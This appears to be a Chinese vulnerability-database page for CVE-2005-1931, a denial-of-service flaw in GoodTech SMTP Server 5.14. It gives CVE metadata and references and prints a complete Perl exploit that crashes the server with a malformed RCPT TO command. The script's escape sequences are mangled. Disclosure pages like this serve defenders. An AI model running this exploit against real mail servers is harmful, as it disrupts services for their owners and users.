GoodTechS SMTPServer RCPT 拒绝服务漏洞-安全小百科

GoodTechS SMTPServer RCPT 拒绝服务漏洞

漏洞ID	1108849	漏洞类型	未知
发布时间	2005-06-07	更新时间	2005-07-05
CVE编号	CVE-2005-1931	CNNVD-ID	CNNVD-200507-045
漏洞平台	Windows	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/1162
https://www.securityfocus.com/bid/89888
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-045

|漏洞详情

GoodTechSMTPServer是一套SMTP服务器程序。GoodTechSMTPServer5.14存在拒绝服务漏洞。远程攻击者可通过带有无效参数的RCPTTO命令使系统拒绝服务(应用程序崩溃)如使用”A”字符。

|漏洞EXP

#===== Start GoodTechSMTPServer_DOS.pl =====
#
# Usage: GoodTechSMTPServer_DOS.pl <ip>
#        GoodTechSMTPServer_DOS.pl 127.0.0.1
#
# GoodTech SMTP Server for Windows NT/2000/XP version 5.14
#
# Download:
# http://www.goodtechsys.com/
#
##########################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "25",
                                    Proto    => "TCP"))
{
        print "Attempting to kill GoodTech SMTP Server at $ARGV[0]:25...";

        sleep(1);

        print $socket "HELO moto.comrn";

        sleep(1);

        print $socket "RCPT TO: Arn";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:25n";
}
#===== End GoodTechSMTPServer_DOS.pl =====

# milw0rm.com [2005-06-07]

|受影响的产品

Goodtech Systems Goodtech Smtp Server 5.14

|参考资料

来源:SECUNIA
名称:15623
链接:http://secunia.com/advisories/15623
来源:BUGTRAQ
名称:20050607DenialofServicevulnerabilityinGoodTechSMTPServerforWindowsNT/2000/XPversion5.14
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111817606013776&w;=2

相关推荐: IBM AIX PAGINIT Local Buffer Overflow Vulnerability

IBM AIX PAGINIT Local Buffer Overflow Vulnerability 漏洞ID 1097364 漏洞类型 Boundary Condition Error 发布时间 2004-12-20 更新时间 2004-12-20 CVE…

文章版权归作者所有，未经允许请勿转载。

THE END